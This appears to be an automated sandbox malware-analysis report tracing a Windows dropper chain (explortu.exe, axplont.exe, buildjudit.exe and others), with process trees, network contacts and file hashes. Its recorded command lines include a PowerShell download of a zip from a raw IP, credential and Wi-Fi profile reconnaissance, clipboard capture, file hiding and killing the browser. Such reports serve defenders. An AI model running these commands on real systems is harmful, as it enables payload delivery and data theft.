N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4032 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
PID 4032 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
PID 4032 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
PID 3536 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
PID 3536 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
PID 3536 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
PID 3536 wrote to memory of 4080 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\1000004002\cfe1e50b73.exe
PID 3536 wrote to memory of 4080 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\1000004002\cfe1e50b73.exe
PID 3536 wrote to memory of 4080 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\1000004002\cfe1e50b73.exe
PID 4080 wrote to memory of 2412 N/A C:\Users\Admin\1000004002\cfe1e50b73.exe C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
PID 4080 wrote to memory of 2412 N/A C:\Users\Admin\1000004002\cfe1e50b73.exe C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
PID 4080 wrote to memory of 2412 N/A C:\Users\Admin\1000004002\cfe1e50b73.exe C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
PID 3536 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\AppData\Local\Temp\1000005001\7ec52fcc46.exe
PID 3536 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\AppData\Local\Temp\1000005001\7ec52fcc46.exe
PID 3536 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\AppData\Local\Temp\1000005001\7ec52fcc46.exe
PID 2412 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000038001\buildjudit.exe
PID 2412 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000038001\buildjudit.exe
PID 5048 wrote to memory of 3644 N/A C:\Users\Admin\AppData\Local\Temp\1000038001\buildjudit.exe C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe
PID 5048 wrote to memory of 3644 N/A C:\Users\Admin\AppData\Local\Temp\1000038001\buildjudit.exe C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe
PID 3644 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe C:\Windows\system32\cmd.exe
PID 3644 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe C:\Windows\system32\cmd.exe
PID 3644 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe C:\Windows\system32\cmd.exe
PID 3644 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe C:\Windows\system32\cmd.exe
PID 3644 wrote to memory of 3844 N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe C:\Windows\system32\cmd.exe
PID 3644 wrote to memory of 3844 N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe C:\Windows\system32\cmd.exe
PID 2196 wrote to memory of 4620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2196 wrote to memory of 4620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3844 wrote to memory of 1592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3844 wrote to memory of 1592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3644 wrote to memory of 4756 N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe C:\Windows\system32\cmd.exe
PID 3644 wrote to memory of 4756 N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe C:\Windows\system32\cmd.exe
PID 4756 wrote to memory of 1844 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net1.exe
PID 4756 wrote to memory of 1844 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net1.exe
PID 3644 wrote to memory of 3560 N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe C:\Windows\system32\cmd.exe
PID 3644 wrote to memory of 3560 N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe C:\Windows\system32\cmd.exe
PID 3644 wrote to memory of 3680 N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe C:\Windows\system32\cmd.exe
PID 3644 wrote to memory of 3680 N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe C:\Windows\system32\cmd.exe
PID 3680 wrote to memory of 2476 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 3680 wrote to memory of 2476 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 3644 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe C:\Windows\system32\cmd.exe
PID 3644 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe C:\Windows\system32\cmd.exe
PID 3644 wrote to memory of 3352 N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe C:\Windows\system32\cmd.exe
PID 3644 wrote to memory of 3352 N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe C:\Windows\system32\cmd.exe
PID 3644 wrote to memory of 4400 N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe C:\Windows\system32\cmd.exe
PID 3644 wrote to memory of 4400 N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe C:\Windows\system32\cmd.exe
PID 3644 wrote to memory of 4580 N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe C:\Windows\system32\cmd.exe
PID 3644 wrote to memory of 4580 N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe C:\Windows\system32\cmd.exe
PID 4400 wrote to memory of 1704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 4400 wrote to memory of 1704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 844 wrote to memory of 2872 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 844 wrote to memory of 2872 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4580 wrote to memory of 4784 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\tar.exe
PID 4580 wrote to memory of 4784 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\tar.exe
PID 3352 wrote to memory of 4956 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3352 wrote to memory of 4956 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3644 wrote to memory of 3412 N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe C:\Windows\system32\cmd.exe
PID 3644 wrote to memory of 3412 N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe C:\Windows\system32\cmd.exe
PID 3644 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe C:\Windows\system32\cmd.exe
PID 3644 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe C:\Windows\system32\cmd.exe
PID 3412 wrote to memory of 3528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 3412 wrote to memory of 3528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 644 wrote to memory of 4276 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 644 wrote to memory of 4276 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 3412 wrote to memory of 2784 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\HOSTNAME.EXE

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe

"C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe"

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

"C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

"C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"

C:\Users\Admin\1000004002\cfe1e50b73.exe

"C:\Users\Admin\1000004002\cfe1e50b73.exe"

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

"C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"

C:\Users\Admin\AppData\Local\Temp\1000005001\7ec52fcc46.exe

"C:\Users\Admin\AppData\Local\Temp\1000005001\7ec52fcc46.exe"

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

C:\Users\Admin\AppData\Local\Temp\1000038001\buildjudit.exe

"C:\Users\Admin\AppData\Local\Temp\1000038001\buildjudit.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe

"C:\Users\Admin\AppData\Local\Temp\1000038001\buildjudit.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""

C:\Windows\system32\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('%error_message%', 0, 'System Error', 0+16);close()""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "chcp"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "chcp"

C:\Windows\system32\chcp.com

chcp

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\chcp.com

chcp

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\HOSTNAME.EXE

hostname

C:\Windows\System32\Wbem\WMIC.exe

wmic logicaldisk get caption,description,providername

C:\Windows\system32\net.exe

net user

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user

C:\Windows\system32\query.exe

query user

C:\Windows\system32\quser.exe

"C:\Windows\system32\quser.exe"

C:\Windows\system32\net.exe

net localgroup

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup

C:\Windows\system32\net.exe

net localgroup administrators

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup administrators

C:\Windows\system32\net.exe

net user guest

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user guest

C:\Windows\system32\net.exe

net user administrator

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user administrator

C:\Windows\System32\Wbem\WMIC.exe

wmic startup get caption,command

C:\Windows\system32\tasklist.exe

tasklist /svc

C:\Windows\system32\ipconfig.exe

ipconfig /all

C:\Windows\system32\ROUTE.EXE

route print

C:\Windows\system32\ARP.EXE

arp -a

C:\Windows\system32\NETSTAT.EXE

netstat -ano

C:\Windows\system32\sc.exe

sc query type= service state= all

C:\Windows\system32\netsh.exe

netsh firewall show state

C:\Windows\system32\netsh.exe

netsh firewall show config

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Users\Admin\AppData\Local\Temp\1000039001\smartsoftsignew.exe

"C:\Users\Admin\AppData\Local\Temp\1000039001\smartsoftsignew.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C cd "C:\Users\Admin\AppData\Local\Temp\putty" & "Smartscreen.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('http://94.103.188.126/jerry/putty.zip', 'C:\Users\Admin\AppData\Local\Temp\putty.zip')"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.com/26uSj6

C:\Windows\SysWOW64\tar.exe

tar -xf putty.zip

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffe391346f8,0x7ffe39134708,0x7ffe39134718

C:\Users\Admin\AppData\Local\Temp\putty\putty.exe

C:\Users\Admin\AppData\Local\Temp\putty\putty.exe

C:\Users\Admin\AppData\Local\Temp\1000043001\volumeinfo.exe

"C:\Users\Admin\AppData\Local\Temp\1000043001\volumeinfo.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,10958211622174121750,4216614518736336347,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,10958211622174121750,4216614518736336347,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2152,10958211622174121750,4216614518736336347,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2700 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,10958211622174121750,4216614518736336347,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,10958211622174121750,4216614518736336347,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,10958211622174121750,4216614518736336347,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4176 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,10958211622174121750,4216614518736336347,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3600 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,10958211622174121750,4216614518736336347,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4772 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,10958211622174121750,4216614518736336347,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5592 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,10958211622174121750,4216614518736336347,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4816 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,10958211622174121750,4216614518736336347,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4712 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,10958211622174121750,4216614518736336347,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4712 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\1000043001\volumeinfo.exe

"C:\Users\Admin\AppData\Local\Temp\1000043001\volumeinfo.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 145.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
RU 147.45.47.155:80 147.45.47.155 tcp
RU 147.45.47.70:80 147.45.47.70 tcp
US 8.8.8.8:53 155.47.45.147.in-addr.arpa udp
US 8.8.8.8:53 70.47.45.147.in-addr.arpa udp
RU 147.45.47.70:80 147.45.47.70 tcp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
MD 94.103.188.126:80 tcp
US 8.8.8.8:53 126.188.103.94.in-addr.arpa udp
US 8.8.8.8:53 iplogger.com udp
US 104.21.76.57:443 iplogger.com tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
US 8.8.8.8:53 57.76.21.104.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 196.187.250.142.in-addr.arpa udp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 195.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 ogs.google.com udp
GB 142.250.187.238:443 ogs.google.com tcp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.200.14:443 apis.google.com tcp
GB 142.250.200.14:443 apis.google.com tcp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 ssl.gstatic.com udp
GB 142.250.179.238:443 play.google.com tcp
US 8.8.8.8:53 238.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 14.200.250.142.in-addr.arpa udp
GB 172.217.169.3:443 ssl.gstatic.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 238.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 3.169.217.172.in-addr.arpa udp
GB 142.250.179.238:443 play.google.com udp
US 8.8.8.8:53 99.201.58.216.in-addr.arpa udp
GB 142.250.179.238:443 play.google.com udp
N/A 127.0.0.1:58015 tcp
N/A 127.0.0.1:58022 tcp
N/A 127.0.0.1:58025 tcp
N/A 127.0.0.1:58027 tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
GB 142.250.179.238:443 play.google.com udp
US 8.8.8.8:53 cobusabobus.cam udp
NL 185.43.220.45:4383 cobusabobus.cam tcp
US 8.8.8.8:53 45.220.43.185.in-addr.arpa udp
US 8.8.8.8:53 5.173.189.20.in-addr.arpa udp

Files

memory/4032-0-0x00000000003F0000-0x0000000000898000-memory.dmp

memory/4032-1-0x0000000077834000-0x0000000077836000-memory.dmp

memory/4032-3-0x00000000003F0000-0x0000000000898000-memory.dmp

memory/4032-2-0x00000000003F1000-0x000000000041F000-memory.dmp

memory/4032-5-0x00000000003F0000-0x0000000000898000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

MD5 d90dc86c07c652736ef253bda10ebdb7
SHA1 8f00555f5f07d01fa443b8cd192d526aea6657d2
SHA256 c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f
SHA512 b5305f4153b972f4e82752fabfe40795154f7ec85a67d70d27839b47299020362a2ff51287c516895ef0690ca791ac1e6ac5e8c06ace34a71876a054aa23611a

memory/4032-17-0x00000000003F0000-0x0000000000898000-memory.dmp

memory/3536-18-0x00000000005B0000-0x0000000000A58000-memory.dmp

memory/3536-19-0x00000000005B1000-0x00000000005DF000-memory.dmp

memory/3536-20-0x00000000005B0000-0x0000000000A58000-memory.dmp

memory/3536-21-0x00000000005B0000-0x0000000000A58000-memory.dmp

C:\Users\Admin\1000004002\cfe1e50b73.exe

MD5 e38381d97120484d6222043615517eb3
SHA1 26113dc47fd2a46de7133aeb1f4491ad0c2037e4
SHA256 1ea19d27a96fde8c92fade71c70d3c7dcb9a75d070d6d400d6eda8c2a5a6babe
SHA512 4f04bef4b67e0b270062147cac23b27480a9a625c0990527d5ac83b58330cf30925138d0ecb96cff4e76109d3c51324be55cf487e34dac467a9e9ebf059498fa

memory/4080-39-0x0000000000360000-0x0000000000833000-memory.dmp

memory/4080-40-0x0000000000360000-0x0000000000833000-memory.dmp

memory/2412-54-0x0000000000C80000-0x0000000001153000-memory.dmp

memory/4080-53-0x0000000000360000-0x0000000000833000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000005001\7ec52fcc46.exe

MD5 b70e66520c92d2385c61d612bb45937e
SHA1 8beae042520d2c0c45ce70aa64ef06ea4cb8b5f0
SHA256 5a145443d06bc42c249f1cfee435f301bb7631218acf1543d84f76de0354249c
SHA512 733f501aa8f4ba446f41dd9e922d7b7e87e4f849160bcbf6d7ae86d848d938b43a1dbdafdf01a05377ffaa5c27bd9b2635e6fc032367ccc02efb99bef6106cfc

memory/1496-73-0x0000000000840000-0x0000000000E37000-memory.dmp

memory/3536-75-0x00000000005B0000-0x0000000000A58000-memory.dmp

memory/3536-74-0x00000000005B0000-0x0000000000A58000-memory.dmp

memory/2412-76-0x0000000000C80000-0x0000000001153000-memory.dmp

memory/3536-77-0x00000000005B0000-0x0000000000A58000-memory.dmp

memory/1496-78-0x0000000000840000-0x0000000000E37000-memory.dmp

memory/3536-79-0x00000000005B0000-0x0000000000A58000-memory.dmp

memory/3536-80-0x00000000005B0000-0x0000000000A58000-memory.dmp

memory/2412-81-0x0000000000C80000-0x0000000001153000-memory.dmp

memory/1496-82-0x0000000000840000-0x0000000000E37000-memory.dmp

memory/3536-83-0x00000000005B0000-0x0000000000A58000-memory.dmp

memory/2412-84-0x0000000000C80000-0x0000000001153000-memory.dmp

memory/1496-85-0x0000000000840000-0x0000000000E37000-memory.dmp

memory/372-89-0x00000000005B0000-0x0000000000A58000-memory.dmp

memory/2684-88-0x0000000000C80000-0x0000000001153000-memory.dmp

memory/2684-91-0x0000000000C80000-0x0000000001153000-memory.dmp

memory/372-93-0x00000000005B0000-0x0000000000A58000-memory.dmp

memory/3536-94-0x00000000005B0000-0x0000000000A58000-memory.dmp

